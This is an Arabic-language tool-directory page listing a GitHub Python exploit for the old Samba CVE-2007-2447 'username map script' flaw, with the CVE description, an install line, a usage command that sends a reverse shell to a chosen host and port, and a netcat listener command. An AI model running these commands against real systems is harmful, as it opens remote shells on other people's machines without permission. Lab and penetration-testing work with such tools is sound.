Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2007-2447 — استغلال بلغة Python لثغرة Samba CVE-2007-2447 في سكربت خريطة اسم المستخدم لتنفيذ الأوامر عن بُعد، مع إرسال حمولة صدفة عكسية إلى مستمع بعيد قابل للتكوين. | Kitploit
أدوات/GitHubGitHub/0xkn/cve-2007-2447
تحليل الثغرات الأمنيةالاستغلالشيل كوداختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHub0xkn/cve-2007-2447

CVE-2007-2447

استغلال بلغة Python لثغرة Samba CVE-2007-2447 في سكربت خريطة اسم المستخدم لتنفيذ الأوامر عن بُعد، مع إرسال حمولة صدفة عكسية إلى مستمع بعيد قابل للتكوين.

عرض المستودع
13منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2007-2447 - username map script

"وظيفة MS-RPC في smbd في Samba من الإصدار 3.0.0 إلى 3.0.25rc3 تسمح للمهاجمين عن بُعد بتنفيذ أوامر عشوائية عبر محارف shell في دالة (1) SamrChangePassword، عندما يكون خيار "username map script" في smb.conf مفعلاً، وتسمح للمستخدمين الموثّقين عن بُعد بتنفيذ أوامر عبر محارف shell في دوال MS-RPC الأخرى في (2) إدارة الطابعات عن بُعد و(3) مشاركة الملفات."

Exploit

Installation:

[*] يتطلب هذا الاستغلال Python 3.7 أو أعلى

python3 -m pip install pysmb 

Usage:

$ ./CVE-2007-2447.py --rhost 10.10.10.3 --lhost 10.10.14.10 --lport 4444 --rport 445
  • --rhost -- المضيف البعيد
  • --lhost -- المضيف المحلي
  • --lport -- المنفذ المحلي
  • --rport -- المنفذ البعيد *[ ] اختياري. الافتراضي=445

لا تنسَ تشغيل المستمع الخاص بك:

nc -lvnp 4444

PoC

image

تنزيل الأداة